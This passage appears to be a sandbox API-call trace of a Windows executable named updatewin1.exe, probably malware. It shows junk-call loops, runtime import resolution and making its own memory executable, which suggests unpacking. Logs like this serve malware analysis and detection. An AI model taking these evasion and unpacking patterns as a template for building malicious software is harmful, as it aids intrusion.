nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.950] AddAtomA (lpString=0x0) returned 0x0 [0120.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.950] AddAtomA (lpString=0x0) returned 0x0 [0120.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.950] AddAtomA (lpString=0x0) returned 0x0 [0120.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.950] AddAtomA (lpString=0x0) returned 0x0 [0120.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.950] AddAtomA (lpString=0x0) returned 0x0 [0120.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.951] AddAtomA (lpString=0x0) returned 0x0 [0120.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.951] AddAtomA (lpString=0x0) returned 0x0 [0120.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.951] AddAtomA (lpString=0x0) returned 0x0 [0120.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.951] AddAtomA (lpString=0x0) returned 0x0 [0120.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.951] AddAtomA (lpString=0x0) returned 0x0 [0120.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.951] AddAtomA (lpString=0x0) returned 0x0 [0120.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.951] AddAtomA (lpString=0x0) returned 0x0 [0120.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.951] AddAtomA (lpString=0x0) returned 0x0 [0120.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.952] AddAtomA (lpString=0x0) returned 0x0 [0120.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.952] AddAtomA (lpString=0x0) returned 0x0 [0120.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.952] AddAtomA (lpString=0x0) returned 0x0 [0120.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.952] AddAtomA (lpString=0x0) returned 0x0 [0120.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.952] AddAtomA (lpString=0x0) returned 0x0 [0120.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.952] AddAtomA (lpString=0x0) returned 0x0 [0120.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.952] AddAtomA (lpString=0x0) returned 0x0 [0120.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.952] AddAtomA (lpString=0x0) returned 0x0 [0120.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.953] AddAtomA (lpString=0x0) returned 0x0 [0120.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.953] AddAtomA (lpString=0x0) returned 0x0 [0120.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.953] AddAtomA (lpString=0x0) returned 0x0 [0120.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.953] AddAtomA (lpString=0x0) returned 0x0 [0120.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.953] AddAtomA (lpString=0x0) returned 0x0 [0120.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0121.050] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0121.050] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0121.050] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0121.050] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0121.050] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0121.050] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0121.051] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0121.051] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0121.051] SetErrorMode (uMode=0x400) returned 0x0 [0121.051] SetErrorMode (uMode=0x0) returned 0x400 [0121.051] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0121.051] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0121.054] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0121.196] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.197] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0121.197] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0121.197] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0121.197] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0121.197] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0121.197] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0121.197] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0121.198] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0121.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0121.200] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0121.201] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0121.202] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0121.202] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0121.202] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0121.202] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0121.202] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0121.202] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0121.202] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0121.202] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0121.202] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0121.202] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0121.203] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0121.203] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0121.203] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0121.203] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0121.203] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0121.203] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0121.203] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0121.203] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0121.203] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0121.203] GetProcAddress (hModule=0x77710000, lpProcName="SetSecurityDescriptorDacl") returned 0x7772415e [0121.203] GetProcAddress (hModule=0x77710000, lpProcName="InitializeSecurityDescriptor") returned 0x77724620 [0121.203] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0121.204] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0121.204] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0121.204] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0121.204] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0121.204] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0121.204] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0121.204] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0121.204] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0121.204] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x75420000 [0121.207] GetProcAddress (hModule=0x75420000, lpProcName="atexit") returned 0x7543c544 [0121.208] atexit (param_1=0x5663e0) returned 0 [0121.209] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0xe02b75a0, dwHighDateTime=0x1d6d58a)) [0121.209] GetCurrentThreadId () returned 0xb38 [0121.209] GetCurrentProcessId () returned 0x43c [0121.209] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=24143981624) returned 1 [0121.267] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0121.269] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0121.269] GetLastError () returned 0x57 [0121.270] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0121.270] GetLastError () returned 0x57 [0121.270] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0121.270] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0121.270] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0121.270] GetLastError () returned 0x57 [0121.271] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0121.271] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0121.272] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0121.273] GetLastError () returned 0x57 [0121.273] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0121.273] GetLastError () returned 0x57 [0121.273] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0121.273] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0121.273] GetProcessHeap () returned 0x550000 [0121.273] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0121.273] GetLastError () returned 0x57 [0121.273] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0121.273] GetLastError () returned 0x57 [0121.273] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0121.273] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x364) returned 0x57a9f0 [0121.274] SetLastError (dwErrCode=0x57) [0121.275] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xc00) returned 0x57ad60 [0121.276] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0x7eb3e63f, hStdError=0xfffffffe)) [0121.276] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0121.276] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0121.276] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0121.276] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" --Admin" [0121.276] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" --Admin" [0121.276] IsValidCodePage (CodePage=0x4e4) returned 1 [0121.276] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0121.276] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0121.276] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.276] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0121.276] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0121.277] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.277] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0121.277] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0121.277] GetLastError () returned 0x57 [0121.277] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0121.278] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0121.278] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0121.278] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", 